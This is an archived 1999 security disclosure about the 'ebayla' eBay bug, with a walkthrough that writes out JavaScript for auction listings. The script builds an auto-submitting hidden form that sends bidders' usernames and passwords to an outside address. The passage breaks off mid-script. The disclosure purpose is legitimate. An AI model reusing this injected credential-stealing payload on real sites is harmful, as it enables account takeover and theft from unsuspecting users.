~~~~~~~~~~~~~~~
from: http://www.because-we-can.com/ebayla/default.htm
contributed to HWA by BHZ
THE EBAYLA BUG AND HOW TO PROTECT YOURSELF
This page describes a security problem that Blue Adept discovered with eBay's
on-line auctions on March 31, 1999 (realaudio interview). The security hole allows
eBay users to easily steal the passwords of other eBay users. The exploit involves
posting items for bid that include malicious javascript code as part of the item's
description. When an unsuspecting eBay user places a bid on the item, the
embedded javascript code sends their username and password to the malicious
user by e-mail. From the victim's point of view, nothing unusual seems to have occured,
so they are unlikely to report/complain to
eBay.
Once a malicious user knows the username/password of the victim's eBay account, she can
assume full control of the account, including the ability to:
o create new auctions (automtically charging the victim's account)
o place bids in the victim's name,
o retract legitimate bids in the victim's name,
o change the victim's username/password, barring them from eBay,
o associate bogus negative/positive comments with an arbitrary seller,
o prematurely close an auction being run by the victim.
o insert the ebayla code into the victim's auction.
(The code could be altered to do this automatically, which would constitute an ebayla virus).
The security problem is dangerously easy to take advantage of. A malicious user needs only
to embed the javascript code into their description of an item for auction. A walk-through of
the exploit demonstrates step-by-step how any user can steal eBay passwords.
Blue Adept notified eBay that a 'huge' potential security problem existed on March 31,1999
and offered assistance (but as of April 18, 1999 has only received form letter
KMM798062C0KM in reply). Information about the ebayla exploit is being made publicly
available to speed the process of fixing the security hole.
TRY THE EBAYLA BUG DEMO ON YOURSELF!
Visit a working demonstration of this exploit at eBay! The demo works with any javascript-enabled
browser, such an Netscape or Internet Explorer. Users must register (free) with eBay to place bids.
** The demo is Blue Adept's own auction infected with eBayla code. WARNING! When you bid on this
item (or even just review your bid without placing it), your username and password will
automatically be mailed back to because-we-can.com.
HOW TO PROTECT YOURSELF
Unfortunately, the potential security issues at eBay are difficult to spot and avoid. If you are
unfamiliar with spotting suspect javascript in the docsource of an html document, the best way to
protect yourself may be to avoid using eBay until adequate html filters have been implemented.
THE EBAYLA BUG WALK-THROUGH
This page demonstrates how the ebayla bug can be exploited by someone using minimal resources to steal usernames and
passwords from eBay users. The resources required to launch the attack are minimal and freely available. The following exploit
is written to work with Netscape Communicator only. The goal is to demonstrate that using only the items listed below, a
malicious user can aquire eBay usernames and passwords. (To see a more efficient (2 line) version of the code that uses a Perl
script, visit the the live demo at eBay.)
INGREDIENTS:
1 Computer with Internet Access
1 email account
STEP 1:
Visit ebay.com and register for a free user account.
STEP 2:
Go to the sellers's area to post an item for auction. When asked to enter the description of the item, post the following
description, containing the ebayla code. The first line of the script indicates the email address to which usernames/passwords
are to be sent.
1 car, comes with windows. crashes frequently. toy.<hr>
WARNING do not bid on this item!! This auction is a demonstration of the
<a href="http://www.because-we-can.com/ebayla/default.htm">ebayla bug</a>.
If you place/review a bid, your username and password will be mailed to
http://www.because-we-can.com.
<script>
recipient = "blue_adept@because-we-can.com";
function printframeset(place_bid, mailUrl, username, password){
document.open();
document.writeln('<script>');
document.writeln('function go(){');
document.writeln('top.b.document.open();');
document.writeln('top.b.document.writeln("<body onLoad=document.form1.submit()>");');
document.writeln('top.b.document.writeln("<form name=form1 method=POST action=' + mailUrl + '>");');
document.writeln('top.b.document.writeln("<input type=hidden name=username value=' + username + '>");');
document.writeln('top.b.document.writeln("<input type=hidden name=password value=' + password + '>");');
document.writeln('top.b.document.writeln("</form>")');
document.writeln('top.b.document.close();');
document.writeln('}');
document.writeln('</scr' + 'ipt>');
document.writeln('</head>');
document.writeln('<frameset rows="100%,*" onLoad="go()">');
document.writeln('<frame name="t" src="' + place_bid + '">');
document.writeln('<frame name="b" src="">');
document.writeln('</frameset>');
document.close();
}
function urlEncode(inStr) {
outStr=' '; //not '' for a NS bug!
for (i=0; i < inStr.length; i++) {
aChar=inStr.substring (i, i+1);
switch(aChar){
case '%': outStr += "%25"; break; case ',': outStr += "%2C"; break;
case '/': outStr += "%2F"; break; case ':': outStr += "%3A"; break;
case '~': outStr += "%7E"; break; case '!': outStr += "%21"; break;
case '"': outStr += "%22"; break; case '#': outStr += "%23"; break;
case '